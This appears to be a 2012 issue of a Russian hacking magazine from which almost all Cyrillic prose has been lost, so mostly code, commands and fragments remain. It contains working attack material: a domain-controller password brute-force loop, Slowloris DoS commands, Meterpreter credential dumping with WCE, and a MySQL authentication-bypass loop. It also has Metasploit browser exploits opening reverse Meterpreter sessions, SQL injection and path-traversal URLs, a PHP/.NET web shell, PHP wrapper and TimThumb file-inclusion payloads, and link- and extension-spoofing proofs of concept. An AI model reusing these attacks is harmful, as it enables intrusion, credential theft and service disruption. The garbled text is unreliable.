, . commandlinekunfu LaNMaSteR53:
@FOR /F %n in (names.txt) DO @FOR /F %p in (passwords.txt)
DO @net use \\DC01 /user:mydomain\%n %p 1>NUL 2>&1 &&
@echo [*] %n:%p && @net use /delete \\DC01\IPC$ > NUL
IPC$ .
, .
. LaNMaSteR53
. , - ,
1000 , ,
.
045
/ EASY HACK
. , ,
Cain
.
LaNMaSteR53
, ,
. :
Login1:Password1
Login1:Password2
Login1:Password3
Login2:Password4
Login2:Password5
Login2:Password6
LaNMaSteR
. , 2000 .
-,
:
cmd /v:on /c "set /a usercount=0 >NUL & for /F %u in
(users.txt) do @set
/a passcount=0 >NUL & set /a lpass=!usercount!*4 >NUL &
set /a upass=!usercount!*4+4
>NUL & @(for /F %p in (passwords.txt) do @(IF !passcount!
GEQ !lpass! (IF !passcount!
LSS !upass! (@net use \\DC01 /user:mydomain\%u %p 1>NUL
SID
!
login: Alphanetworks
password: wrgg19_c_dlwbr_dir300
DNS
: - !
DNS-
SQL-.
sqlmap.
SQL-
OWASP. - ,
, c Sony
Anonymous , ,
? :)
, SQL- ,
. ,
, ... , , , -
.
DNS tunneling
, , . ,
, ,
, - ,
.
, - , DNS-,
. , ,
( ) DNS-.
,
, DNS-. . , , , DMZ
046
SQL-, DNS
. ( ?)
DNS-. , ,
( , DNS?). ,
DMZ ,
DNS-. , ,
DNS-,
08 /163/ 2012
. , DNS,
, -
.
, .
- ( ) .
DNS-,
(
).
DNS-
.
,
. ,
:).
, DNS . Corelan - download&execute
DNS, Metasploit. ,
Meterpreter
. - -
DNS
SQL-. !
, DNS- , blind,
.
sqlmap
, , sqlmap (goo.gl/xl4Hv),
.
,
. - ,
.
DoS, , : , . -
, (, DEP
ASLR) remote code execution
DoS. --, -
. DoS/DDoS-.
. DoS = = .
, DoS -
, , -
. , , ,
100 000 , .
, , , HTTP.
, - , . :). HTTP-
,
.
Slowloris (goo.gl/tbe81). (Robert RSnake Hansen) 2009 ,
. HTTP- -,
, , . ,
- HTTP- ,
. , - ,
-. , ,
. ,
. , .
08 /163/ 2012
-,
HTTP-.
, .
, , , -
Apache.
Slowloris . -, ,
. -, , , .
, , -
, .
, - .
, Slowloris ,
Slowloris defcon-russia.ru
047
/ EASY HACK
. , . - -,
, RDP
, , RDP :).
, . Slowloris,
Perl CPAN, .
, , -
Windows Slowloris .
BACKTRACK 5
. Offensive Security
BackTrack. . BackTrack
,
METERPRETER
Easy Hack - ,
-, . , Metasploit.
-- Meterpreter.
, :).
, Meterpreter
exe.
, !
,
- ,
, meterpreter . !
- ,
(- SMBRelay, Pass the Hash),
.
, , ,
:).
-, Meterpreter , ( incognito) ,
,
. , ,
NTLM- ,
- . WCE.
, , mimikatz.
. , ,
Meterpreter.
,
exe - .
-. .
(
048
1. Perl:
perl -MCPAN -e 'install IO::Socket::INET'
perl -MCPAN -e 'install IO::Socket::SSL'
2. :
perl slowloris.pl -dns victim.com
, ,
GET ( ), HEAD,
POST, HTTPS.
-, ,
, .
Ubuntu, ,
, apt-get.
BackTrack
5 R2 goo.gl/1Jlwa. .
meterpreter). , ,
?
meterpreter forensic. .
. ,
.
meterpreter .
.
, WCE,
meterpreter-:
execute -H -m -d calc.exe -f wce.exe -a "-o creds.txt"
execute , -;
-H ;
-m , ;
-d dummy-exe,
;
-f exe -,
;
-a "-o creds.txt" .
,
. ,
, .
Meterpreter, , , dummy-exe.
,
exe .
:).
. ,
dummy-.
. !
08 /163/ 2012
(ivinside.blogspot.com)
.
.
MySQL/MariaDB
CVSSV2
7.5
(AV:N/AC:L/AU:N/C:P/I:P/A:P))
BRIEF
MariaDB
CVE-2012-2122 MySQL
MariaDB. ,
( root,
) .
EXPLOIT
,
MariaDB/MySQL. ,
(SHA ),
, .
,
.
memcmp() :
typedef char my_bool;
...
my_bool check(...) {
return memcmp(...);
}
, check() char,
memcmp() int. int char,
, int. ,
memcmp() , , 0x100 -
050
, char . ,
. memcmp()
, , .
Accuvant Labs (pastie.org/4064638), memcmp()
.
,
MySQL/MariaDB.
1/256,
:
$ for i in 'seq 1 1000'; do mysql -u root --password=bad \
-h 127.0.0.1 2>/dev/null; done
MySQL, .
Pwnie Express
Metasploit,
.
:
$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf auxiliary(mysql_authbypass_hashdump) >
set RHOSTS 127.0.0.1
msf auxiliary(mysql_authbypass_hashdump) > run
[+] 127.0.0.1:3306 The server allows logins, proceeding
with bypass test
[*] 127.0.0.1:3306 Authentication bypass is 10% complete
[*] 127.0.0.1:3306 Authentication bypass is 20% complete
[*] 127.0.0.1:3306 Successfully bypassed authentication
after 205 attempts
08 /163/ 2012
0:000> u eip
Flash32_11_2_202_228!DllUnregisterServer+0x300e84:
104b1b2d 8b422c mov
eax,dword ptr [edx+2Ch]
104b1b30 53
push
ebx
104b1b31 ffd0
call
eax
TARGETS
MariaDB MySQL 5.1.61, 5.2.11, 5.3.5, 5.5.22 : Ubuntu Linux 64-bit (10.04, 10.10, 11.04, 11.10, 12.04),
,
Metasploit, Internet
Explorer 6/7/8 Windows XP SP3:
openSUSE 12.1 64-bit, Debian Unstable 64-bit, Fedora 16, Arch Linux.
SOLUTION
. ,
MySQL .
my.cnf [mysqld] bind-address 127.0.0.1,
.
Adobe
Flash Player
CVSSV2
10.0
(AV:N/AC:L/AU:N/C:/I:/A:)
BRIEF
Adobe Flash Player, ,
. .
Word Flash (SWF) .
.
EXPLOIT
Metasploit , . .
SWFs spray,
.
, AMF (Action Message Format) RTMP (Real Time Messaging
Protocol). RTMP
,
- .
(, )
- , RTMP-
. Flash Media Server,
systemMemoryCall(),
.
, PCAP-,
RTMP-.
,
systemMemoryCall(). , Abode
Flash Player :
(348.540): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception
08 /163/ 2012
msf
msf
[*]
[*]
[*]
[*]
[*]
msf
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[+]
[+]
TARGETS
Adobe Flash Player 11.2.202.233
Windows, Macintosh Linux, Adobe Flash Player 11.1.115.7
Android 4.x Adobe Flash Player 11.1.111.8 Android 3.x 2.x.
SOLUTION
Adobe Flash Player .
Microsoft
XML Core Services
CVSSV2
10.0
(AV:N/AC:L/AU:N/C:/I:/A:)
BRIEF
, Internet Explorer
051
/
Microsoft Office.
IM, , .
MSXML
,
.
EXPLOIT
get_definition() XML Node. ,
Internet Explorer, :
<object
classid="clsid:6D90f11-9c73-11d3-b32e-00C04f990bb4"
id="xx">
</object>
<script>
document.getElementById("xx").object.definition(0);
</script>
,
,
_dispatchImpl :: InvokeHelper().
Metasploit, :
msf > use exploit/windows/browser/msxml_get_definition_code_
exec
msf exploit(msxml_get_definition_code_exec) > set payload
windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(msxml_get_definition_code_exec) > set lhost
10.0.1.3
lhost => 10.0.1.3
msf exploit(msxml_get_definition_code_exec) > exploit
[*] Exploit running as background job.
[*]
[*]
msf
[*]
[*]
[*]
[*]
[*]
[*]
[*]
, memcmp()
[*]
[*]
[+]
[+]
TARGETS
Metasploit IE6/7/8/9, Windows XP, Vista
Windows 7 SP1.
SOLUTION
.
ActiveX MSXML
Internet Explorer Microsoft Office.
, Microsoft Microsoft
Fix it 50897.
Internet
Explorer
CVSSV2
10.0
(AV:N/AC:L/Au:N/C:/I:/A:)
BRIEF
Microsoft Internet Explorer
,
.
Same ID Property Remote Code Execution Vulnerability.
Dark Son Yichong Lin.
Metasploit Juan Vazquez.
CVE-2012-1875.
IE
052
EXPLOIT
- (ROP) DEP ASLR.
08 /163/ 2012
Java, msvcr71.dll
ASLR, , Internet Explorer .
Metasploit.
( ):
msf > use exploit/windows/browser/ms12_037_same_id
msf exploit(ms12_037_same_id) > set payload windows/
meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms12_037_same_id) > set lhost 10.0.1.3
lhost => 10.0.1.3
msf exploit(ms12_037_same_id) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 10.0.1.3:4444
[*] Using URL: http://0.0.0.0:8080/gTHJEKBboMi
[*] Local IP: http://10.0.1.3:8080/gTHJEKBboMi
[*] Server started.
msf exploit(ms12_037_same_id) >
[*] 10.0.1.79
ms12_037_same_id - Client
requesting: /gTHJEKBboMi
[*] 10.0.1.79
ms12_037_same_id - Using msvcrt ROP
[*] 10.0.1.79
ms12_037_same_id - Sending html
[*] Sending stage (752128 bytes) to 10.0.1.79
[*] Meterpreter session 1 opened (10.0.1.3:4444 ->
10.0.1.79:1685) at 2012-06-18 13:42:49 -0500
[*] Session ID 1 (10.0.1.3:4444 -> 10.0.1.79:1685)
processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3916)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1680
[+] Successfully migrated to process
TARGETS
Metasploit Internet Explorer 8 Windows XP
SP3 7 SP1, , in the wild,
Windows, Windows Vista
Windows 7.
, RTMP-
SOLUTION
Microsoft.
iBoutique
eCommerce v4.0
CVSSV2
7.5
(AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
Vulnerability Laboratory Research , -
iBoutique CMS v4.0.
EXPLOIT
1. iBoutique v4.0 SQL-, SQL-
.
.
OrderNumber index.
php, :
SQL_ERROR
select * from websiteadmin_orders WHERE OrderNumber=
254' AND UserName='hack'
You have an error in your SQL syntax;
check the manual that corresponds to your MySQL
server version for the right syntax to use near 'AND
UserName='hack' at line 1
Details for order #254'
:
http://127.0.0.1:1338/iboutique/index.php?page=en_Orders
&OrderNumber=258'+/*!Union*/+/*!SelEct*/+1,2,3,4,version(
),6,7,8,9,10--%202. ,
.
, my area my profile edit profile (first name, last name, email, state,
address ) HTML-, <iframe
src=www.vuln-lab.com onload=alert("VL")/>.
,
.
TARGETS
iBoutique eCommerce v4.0 , , .
SOLUTION
. z
ROP, CVE-2012-1875
08 /163/ 2012
053
INTRO
,
.
: ,
.
. , ,
. , spoof-
,
, . , :
(post-exploitation).
, ,
, ,
-
. , -,
, , ,
-,
. ,
.
054
spoofing
, .
,
old school spoofing
.
, , .
, , ,
, . , ,
,
(
). ,
. , DNS: , , (][_#5_2012)
DNS-
08 /163/ 2012
UDP (, TCP/IP, , ) .
(local) (net).
.
,
,
,
. , , . , ,
. .
1. Spoofing TCP/IP & UDP . - TCP
UDP :
IP spoofing IP- source IP-.
, , ,
;
ARP spoofing Ethernet-,
. ARP;
DNS Cache Poisoning DNS- ;
NetBIOS/NBNS spoofing
Microsoft.
2. Referrer spoofing .
3. Poisoning of file-sharing networks
.
4. Caller ID spoofing VoIP
5. E-mail address spoofing e-mail .
6. GPS Spoofing
GPS-.
7. Voice Mail spoofing
.
8. SMS spoofing ,
SMS-.
.
.
,
,
. , .
EXTENSION SPOOFING
,
Zhitao
Zhou. 0x202E (RLO) ,
Windows (explorer.exe).
:
3pm.SCR , , (
. . ). 3pm.
SRC 0x202E (. . 1),
Windows :
Super music uploaded by RCS.mp3
(Restorator, Resource Hacker).
,
, . ,
,
. C#,
, 0x202E:
Public Sub U_202E(fi le As String, extension As String)
Dim d As Integer = file.Length - 4
Dim u As Char = ChrW(823)
Dim t As Char() = extension.ToCharArray()
Array.Reverse(t)
Dim dest As String = fi le.Substring(0, d) & u &
New String(t) & fi le.Substring(d)
System.IO.File.Move(file, dest)
End Sub
IDN-
IDN- 2001
. , , 2005
ShmooCon.
pypal.com (xn--pypal-4ve.com Punycode),
. Slashdot.org
, ,
.
UTF
08 /163/ 2012
055
UTF
.
.
, . , TrojanDropper:Win32/Vundo.L (
vk.com, vkontakte.ru, *odnoklassniki.ru)
.
%SystemRoot%\system32\drivers\etc\hosts
- hosts UTF- (0043E), hosts
:
92.38.66.111
92.38.66.111
92.38.66.111
odnoklassniki.ru
vk.com
vkontakte.ru
? !
RLO Charmap
-
STATUS BAR / LINK SPOOF
(<a href=''>). , ,
, .
JavaScript- . , iamjuza,
PoC
,
. , ,
. Proof-of-Concept
1337day.com. :
<html><head>
<meta http-equiv="Content-Type"
content="text/html; charset=ISO-8859-1"></head>
<body>
<a href="javascript:spoof();">Click Me</a>
<script>
var a=null;
function spoof() {
a = window.open('./spoofing.php')
WARNING
FLAMER MICROSOFT
Microsoft Security Advisory (2718704) Unauthorized Digital
Certificates Could Allow Spoofing.
Flamer: -
,
- .
056
, MITM-,
.
- Security Advisory #2718704
High.
.
,
,
.
08 /163/ 2012
hosts
window.setTimeout("a.history.back()", 4500);
window.setTimeout("a.location.href='./spoofing.php'", 5000);
}
</script>
</body></html>
Click Me spoof(),
:
(spoofing.php) a;
4500 (4,5 ) ( window.
setTimeout) ,
a.history.back(),
;
5000
location spoofing.php, .
URL .
CVE-2010-4045 (Opera <= 10.62):
057
<html><head>
<meta http-equiv="Content-Type"
08 /163/ 2012
057
content="text/html; charset=ISO-8859-1">
</head><body>
<h1>Proof of Concept - OPERA High Location Bar Spoofing</h1>
<br><img onclick="location.reload();setTimeout(stop();
location.href='http://google.com', 0500)" src="click.png">
</body></html>
,
(<img>), (location.reload()),
.
0-day Safari iOS 5.1:
<body>
<fieldset>
<legend>Some payment/bank website included here.
</legend>
<ol>
<li>start poc<xmp>click the button to run the poc.
</xmp><button id="one">Demo</button></li>
</ol>
</fieldset>
<script type="text/javascript">
document.getElementById('one').onclick = function()
{
myWindow=window.open('http://www.apple.com',
'eintitel','width=200,height=100,location=yes');
myWindow.document.write("<html><head></head>
<body><strong>This is fishing page.</strong>
<br><br><iframe src=\"http://www.apple.com\");>
</iframe></scri+pt></body></html>");
myWindow.focus();
return false;
}
</script>
<br><br><br>
<iframe id="ifR1" name="ifR1"width="100px"
height="50px" src="http://www.apple.com"></iframe>
</body>
RLO (. . 4).
source.html
source.html%20%2E.
, ,
. ,
, .
IDN CLONES ,
,
DNS, IDN
(Internationalized Domain Names )
. -
:
1. , .
( l 1, O 0), (rn m, cl d).
2. -, .
3. ( ,
, Twitter, iframe, ).
4. :).
, , -
: .
IDN- 2005
, , IDN. , .org
. .
IDN
. xn
,
. ,
IDN.
IDN-
.
punycode- IDN-,
. , , ;-). (src/exploits/link_spoof.py).
<html><head><title>Source</title>
<meta charset="UTF-8">
<script type="text/javascript">
history.replaceState(null, null,
'source.html' + String.fromCharCode(8237));
</script></head><body>
,
. , .
.
? :). z
Demo
myWindow ,
apple.com 200100,
Safari . myWindow HTML (JavaScript/VB/etc)
document.write().
Safari myWindow.
, ,
;-).
058
08 /163/ 2012
PHP
PHP
PHP-
.
,
.
?
PHP.
,
.
PHP , , .
.
:
1. PHP- ( ,
C-);
2. C- .
PHP Roadsend PHP, Phalanger,
Quercus on Resin, HipHop for PHP. ,
.
08 /163/ 2012
PHP
Roadsend PHP
Roadsend PHP , , -,
MicroServer. PHP- . -
- .
-
Apache, lighttpd, nginx,
- CGI
FastCGI.
059
.1. /etc/passwd
Phalanger
Phalanger , ,
PHP, ,
. PHP-
.NET-,
-,
PHP. Phalanger -
IIS, , PHP.
Quercus on Resin
- Resin.
Resin -
Java, PHP,
Quercus. Resin Professional
Open Source. Professional PHP-
- Java, Open Source PHP-
.
,
,
PHP. , ?
?
060
,
. ,
:
- ,
-;
,
HTTP Parameter Pollution HTTP Parameter Contamination,
;
;
, PHP.
Roadsend PHP, , MicroServer. ,
Path Traversal. .
Path Traversal Roadsend PHP
http://host/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc
%2fpasswd
,
, URL-.
(. . 1). :
Path Traversal
http://host//etc/passwd
Roadsend PHP ,
, , .
.
, - : -
08 /163/ 2012
PHP
.5.
, -
. HTTP Parameter
Contamination.
,
client-side . . 1 PHP
LAMP. , PHP.
Phalanger Quercus. , ,
500 (. fingerprint . 2).
,
null-byte,
(. ), ,
.
, Local File Inclusion
foreach($_GET["language"]
as $langDir => $langFile)
{
include($langDir."/".$langFile.".php");
}
, . null-byte , .
/etc/passwd
http://host/index.php?language["/etc/passwd%00"]=1
.4. $_SERVER["DOCUMENT_ROOT"]
-. PHP register_globals,
5.4.0 . ,
PHP , . Quercus
register_globals (
), POST ,
. , ,
POST, _SERVER. . 3
_SERVER["REMOTE_
ADDR"], , ,
IP-.
$_SERVER["DOCUMENT_ROOT"], , Local File Inclusion (. . 4).
, PHP (.
) ,
.
$_SERVER["DOCUMENT_ROOT"]
<?php
include($_SERVER["DOCUMENT_ROOT"]."header.php");
?>
advisory: bit.ly/MFeJYu.
.
, _SESSION :
.
LAMP
test.php?=
Array
(
)
test.php?[]=
Array
(
)
Array
(
[a] => Array
test.php?a[][= (
[0] =>
)
)
.3. _SERVER
08 /163/ 2012
IIS 7.5 +
Phalanger 3.0
Array
(
[] =>
)
Array
(
[[]] =>
)
Error 500
HipHop
Array
(
)
Array
(
)
Array
(
[a] => Array
(
[0] =>
)
)
Quercus on
Resin <= 4.0.26
Array
(
[] =>
)
Array
(
[0] =>
)
Error 500
1.
061
0 ,
PHP. ,
.
, PHP . , disable_functions,
( , , shell-),
open_basedir,
. .
disable_functions
shell-
disable_functions: system, exec, shell_exec, passthru,
popen, proc_open, pcntl_exec
.6 Null-byte
, , _SESSION, .
PHP , (
false). ,
PHP (bit.ly/LQsvHh).
. PHP
. , ,
.
// script 1
<?php
$xArray = array(TRUE, FALSE, 1, 0, -1, "1", "0", "-1",
NULL, array(), "php", "");
foreach($xArray as $x) {
if($x == array()) { echo("TRUE"); }
else { echo("FALSE"); }
echo("<br>");
}
?>
// script 2
<?php
$xArray = array(TRUE, FALSE, 1, 0, -1, "1", "0", "-1",
NULL, array(), "php", "");
foreach($xArray as $x) {
if(array() == $x) { echo("TRUE"); }
else {
echo("FALSE"); }
echo("<br>");
}
?>
, , , . , . , .
3, Quercus
,
PHP. , array()
062
, shell- .NET, . .
shell- .NET
<?php
$process = new Diagnostics\Process();
$process->StartInfo->FileName = "cmd.exe";
$process->StartInfo->WorkingDirectory = "C:\\";
$process->StartInfo->Arguments = "/c ".$_GET["cmd"];
$process->Start();
$process->WaitForExit();
?>
OLD SCHOOL
Roadsend PHP Quercus
HTML-,
(. . 5). , , 2012
, 2002-?
Path Traversal
Quercus, 3- - Resin,
Path Traversal .
. -
LAMP
Array
test.php?a%=1 ([a%] => 1
)
Array
test.php?a =1 ([a_] => 1
)
Array
test.
(
php?a%00b=1 [a] => 1
)
IIS 7.5 +
Phalanger 3.0
Array
(
[a%] => 1
)
Array
(
[a ] => 1
)
Array
(
[a b] => 1
)
HipHop
Array
(
[a%] => 1
)
Array
(
[a_] => 1
)
Array
(
[a] => 1
)
Quercus on
Resin <= 4.0.26
Array
(
[a ] =>
)
Array
(
[a ] => 1
)
Array
(
[a b] => 1
)
2.
08 /163/ 2012
PHP
.
HTTP-,
Content-Type: multipart/form-data;
boundary=---------------------------101412320927450
Content-Length: 228
-----------------------------101412320927450
Content-Disposition: form-data; name="test";
filename="../shell.php"
Content-Type: application/octet-stream
<?php
phpinfo();
?>
-----------------------------101412320927450--
advisory: bit.ly/MFeJYu. .
Null-byte
Path Traversal
Quercus.
null-byte,
(, jpg),
. , ,
.
Script #1
(resin 3.1.12)
Script #1
(resin 4.0.26)
Script #2
True
False
False
True
False
True
True
True
False
True
True
True
True
True
-1
False
True
True
"1"
False
False
True
"0"
False
False
True
"-1"
False
False
True
Null
True
True
True
array()
True
True
True
"php"
False
False
True
""
False
False
True
3.
: (jpg, png
gif), , .
, null-byte
null-byte,
.jpg. , .jpg .
.
<?php
if(isset($_FILES["image"])) {
if(!preg_match('#\.(jpg|png|gif)$#',
$_FILES["image"]["name"])) {
die("Hacking attempt!");}
copy($_FILES["image"]["tmp_name"],
"./uploads/".$_FILES["image"]["name"]
);
}
?>
PHP ( ,
), :
;
( );
;
Path Traversal .
-
PHP. Quercus,
. : HipHop - PHP. z
WWW
08 /163/ 2012
:). PHDays ,
,
- -
. ,
, slidesha.
re/Nl2VLF.
,
(www.phdays.ru).
-
Positive Technologies
advisory:
bit.ly/MFeJYu.
063
1 (2)
PHP
, .
wrapper ,
, ,
. , , , .
WRAPPER'
Positive Hack Days
2012
INTRO
, PHP
, . OWASP TOP 10 WASC TCv2.
, , ,
( ).
, PHP wrappers
.
, ,
.
064
$filename . ,
:
$handle = fopen($file, "rb");
while (!feof($handle))
{
$contents .= fread($handle, 8192);
}
print $contents;
(wrapper). ,
, . , fopen
:
FTP:
ftp://user:password@10.0.0.1/pub/file.txt;
, , server-status/serverinfo IP: http://127.0.0.1/server-status;
,
(PHP >= 5.3.6): php://fd/XXX;
OS (
expect): expect://ls.
08 /163/ 2012
( )
, . , ,
.
, - , .
read. ,
.
, copy()
,
php://output, .
, copy()
, .
copy('/etc/passwd' , 'php://output');
file_put_
contents ,
write:
file_put_contents('php://output',
file_get_contents('/etc/hosts'));
ZIP?
ZIP .
,
. PHP
zip.
Linux- zip , PHP
--enable-zip.
, ;
, , , /.
zip
: , zip-.
zip-
$zip = new ZipArchive;
if ($zip->open('/tmp/any_name_zip_arxiv',1))
{
$zip->addFromString( '/my/header.html',
'<?php print_r(ini_get_all());' );
}
$zip->close();
zip- , zip:// .
08 /163/ 2012
Registered PHP
Streams
Registered Stream
Sockrt Transport
Registered Stream
Filters
zip-
print file_get_contents(
'zip:///tmp/any_name_zip_arxiv#/my/header.html');
, , Remote
File Include, null-.
:
$s = $_POST['path'];
include $s.'/header.html';
,
. http://, ftp://, data://
allow_url_include,
null-
magic_quotes_gpc. ,
allow_url_include=Off magic_quotes_gpc=On
.
, !
,
. , zip-, , PHP-,
zip://.
path=zip:///tmp/any_name_zip_arxiv#/my
PHP, ,
PHP HTML-.
phpinfo().
, LFI/RFI,
rdot.org. , allow_url_fopen zip://.
WHERE IS MY DATA://?
data://
-.
. RFC 2379,
:
dataurl
:= "data:" [ mediatype ] [ ";base64" ] "," data
mediatype := [ type "/" subtype ] *( ";" parameter )
data := *urlchar
parameter := attribute "=" value
mediatype ,
:
data://anytype/anysubtype;myattr!=V@l!;youattr?=Op$;base64
. , TimThumb v1.x
:
065
function validate_url ($url) {
$pattern="/\b(?:(?:https?):\/\/|www\.)
[-a-z0-9+&@#\/%?=~_|!:,.;]*[-a-z0-9+&@#\/%=~_|]/i";
return preg_match ($pattern, $url);
}
:
data://text/plain;charset=http://w?param=anyval;base64,
SSBsb3ZlIFBIUAo
PHP , stream_get_meta_data().
,
:
,
parse_url, . ,
, ,
img.youtube.com.
$url_info = parse_url($_POST['src']);
if ($url_info['host'] === 'img.youtube.com') {
$name = str_replace('/', '',
substr($url_info['path'], 4));
copy( $src, './'.$name );
}
img.youtube.com :
,
.
data://
! ? :
$password = 'secret';
$file = $_POST['file'];
$fp = fopen( $file, 'r');
extract(stream_get_meta_data($fp));
if ( $mediatype === 'text/plain') { ... }
if ( $_COOKIE['admin'] === $password) { ... }
$file data,
POST DATA: file=data://text/plain;password=mysecret;base64
$password ,
, .
compress.zlib://.
POST DATA: src=compress.zlib://img.youtube.com/../path/to/
local/file;
,
data://:
POST DATA: src=data://img.youtube.com/
aaamy.php?;base64,SSBsb3ZlIFBIUAo
: , .
, data://
compress.zlib:// ,
.
TimThumb.
Cookie: admin=mysecret
TIMTHUMB V1.X
! :). .
PHP ,
prase_url(). , URL. :
URL, :
TimThumb ,
WordPress. 2011 TimThumb v 1.32
,
PHP- (bit.ly/n8YdTd). ,
(bit.ly/qRrUpF).
,
URL ,
. , blogger.com,
, URL
, blogger.com.attacker.com,
.
print_r(parse_url(
'anysheme://anysite.com/;http://w?v@l=!'));
http://www.target.com/timthumb.php?
src=http://blogger.com.attacker.com/pocfile.php
, compress.zlib:// gz-.
, zlib-,
.
, /etc/hosts :
readfile('compress.zlib:///etc/hosts');
1.32 (revision 142).
. , 1.34 (revision 145):
data://
066
08 /163/ 2012
2. getimagesize , .
, .
$local_filepath, , php://filter, compress.zlib://.
unlink .
, .
, .
src=http://www.youtube.com/?local_filepath=php://filter/
resource%3D./cache/test.php&url_info[host]=
img.youtube.com&src=http://site.com/thumb.txt
1. 149- ,
. parse_str . , URL,
$src.
curl_init , file_get_contents/file_put_contents.
, , curl_init,
PHP .
WordPress
, check_
external :
1. parse_str
.
, ,
: $url_info['host'], $src, $local_filepath. .
08 /163/ 2012
if(!$img = file_get_contents($src)) {
display_error ('remote file for ' .
$src . 'can not be accessed.
It is likely that the file
permissions are restricted');
}
if(file_put_contents($local_filepath,
$img) == FALSE) {
display_error ('error writing
temporary file');
}
, data://
:
data://img.youtube.com/e;charset=
http://w?var=;base64,SSBsb3ZlIFBIUAo
compress.zlib://
:
compress.zlib://youtube.com/../http://?/../../path/to/
local/file
, , RCE
data, ,
compress.zlib.
, PHP File Manipulation.
,
file_exists, is_file, filesize . Suhosin
, allow_url_include On.
php://filter
-. Stay tuned! z
067
X-Tools
:
Chris Shields, Matthew Toussain
URL:
kinozoa.com
:
*nix
:
Georges Bossert,
Frederic Guihery
URL:
www.netzob.org
:
*nix
:
Matt Graeber
URL:
https://github.com/
mattifestation/PowerSploit
:
Windows
MITM-
RE
POWERSHELL POST-EXPLOITATION
Subterfuge ,
, Python.
,
ARP (Address Resolution Protocol) .
:
Netzob
,
-, .
:
/ ;
(IDS, IPS, );
.
,
,
,
,
.
.
: NeedlemanWunsch
;
(UPGMA); L*m Dana
Angluin.
PowerSploit Microsoft
PowerShell ,
. PowerSploit
:
;
;
;
HTTP;
;
Race Condition;
DNS-;
Evilgrade;
.
HTTPS- ,
, PPTP,
Cisco IPSec, L2TP, OpenVPN, SSH,
, .
.
068
Inject-Dll;
Inject-Shellcode;
Encrypt-Script;
Get-GPPPassword;
Invoke-ReverseDnsLookup.
,
DLL - , Group Policy
IP-
PTR- DNS,
.
,
PowerShell PE- , reverse engineering
, C#.
: www.exploit-monday.com.
08 /163/ 2012
:
SkyLined
URL:
code.google.
com/p/alpha3
:
Windows
:
Joxean Koret
URL:
zerowine.sourceforge.
net
:
Windows
LPHANUMERIC -
ALPHA3 Python
SkyLined,
x86 x64 . ?
: ,
, .
ALPHA3 .
:
, ,
,
- .
:
ohdae
URL:
ohdae.github.com/
Intersect-2.5
:
*nix
POST-EXPLOITATION
LINUX
Zero Wine ,
OC Windows.
Zero Wine
(
WINE)
,
. :
Intersect
Linux,
Python.
,
, ,
.
,
.
command-line Intersect,
.
30
4 ,
:
raw trace ,
WINE;
;
;
API- .
Zero Wine
Debian QEMU,
-.
: ,
. ,
(, Armadillo),
WINE .
08 /163/ 2012
;
;
;
.
.
-
. :
ALPHA3.py ascii EDI --input="file"
> shellcode.txt
,
,
-
( EDI).
,
- :
ascii, cp437, latin-1, utf-16.
:
rohitab.com
URL:
www.rohitab.com/
apimonitor
:
Windows
6
API-
API Monitor
API-,
.
,
.
:
64- Windows;
;
10 000 API-
600 COM-;
COM;
;
;
;
;
;
;
;
DLL;
.
,
.
.
069
MALWARE
(drobotun@xakep.ru)
,
?
,
. , ,
.
.
,
,
: ,
070
:
, , ;
, , ;
.
, , ,
,
.
.
, , . ,
,
.
, :
-
,
;
,
;
, .
08 /163/ 2012
, , , - , , - -
,
, ,
,
.
,
. 72
,
?
. 74
. ,
,
hosts,
, . .
. 73
.
.
?
. ?
. , ,
, ,
, .
,
lsas, services, system, winlogon,
svchost, csrss .
, %windir%\system32\ ( explorer.exe, ,
, %windir%\). , , .
, .
,
. ,
, , ,
"svshost" .
,
. .
, Process
Explorer SysInternals ProcessHacker,
Kernel Detective
. ,
( ,
WinDbg).
, , , ,
, .
, ( ,
, ), ,
-
.
08 /163/ 2012
.
? (
)
Kernel Detective,
, API NtQuerySystemInformation.
, - ,
,
071
MALWARE
.
. ?
(
,
- ).
?
.
,
. ,
, hosts,
, . .
.
?
,
(,
).
?
. ?
. , ,
(,
,
). . , Handle
SysInternals , .
, ,
WinObj SysInternals
Suit.
, .
, , , , - (
svchost.exe explorer.exe),
(
explorer.exe, winlogon.exe).
,
- .
, SysInternals
TcpView,
, TCP UDP-.
, ,
, .
072
.
- , ,
ntdll.dll!LdrLoadDll
kernel32.dll!LoadLibrary
ntdll.dll!EnumerateValueKey
ntdll.dll!EnumerateKey
advapi.dll!RegEnumKey
advapi.dll!RegEnumKeyEx
advapi.dll!RegEnumValue
ntdll.dll!OpenProcess
ntdll.dll!OpenThread
ntdll.dll!NtQuerySysteminformation
ntdll.dll!RtlGetNativeSystemInformation
kernel32.dll!Process32Next
kernel32.dll! CreateToolhelp32Snapshot
ntdll.dll!NtQueryDirectoryFile
ntdll.dll!NtCreateDirectoryObject
ntdll.dll!NtOpenDirectoryObject
ntdll.dll!QueryInformationFile
ntdll.dll!OpenFile
ntdll.dll!CreateFile
kernel32.dll!FindNextFile
kernel32.dll!CopyFile
kernel32.dll!MoveFile
kernel32.dll!DeleteFile
,
,
API-,
08 /163/ 2012
. 76
PID
, taskkill.
?
. 75
.
?
(
, ,
,
).
?
-
, Process
Hacker Kernel
Detective. ?
,
. ?
.
? (
)
Process
Hacker Process
Explorer
. ?
.
?
,
.
. , , hosts,
,
. .
, , ,
, explorer.exe,
, , .
, . ( )
explorer.exe
08 /163/ 2012
. 74
, , (
, , ,
).
, ,
. - .
Autoruns SisInternals (
).
,
.
,
, . ,
. , Autoruns
. Process Explorer
- ,
() .
: (
Suspend), , , , ,
.
.
073
MALWARE
. ?
Unlocker
-
.
. ?
.
?
explorer.exe ( WinDbg)
(. ).
?
(
)
.
.
. ,
, hosts,
, . .
API.
API ( ,
). ,
- .
, .
. ,
,
.
,
.
, ,
, , , Kernel
074
.
?
,
.
()
.
Detective .
.
, ,
. ,
ntdll.dll
EAX ,
, , :
MOV edi, edi
PUSH ebp
MOV ebp, esp.
,
.
: , , ,
, .
LiveCD, ,
, .
, :). z
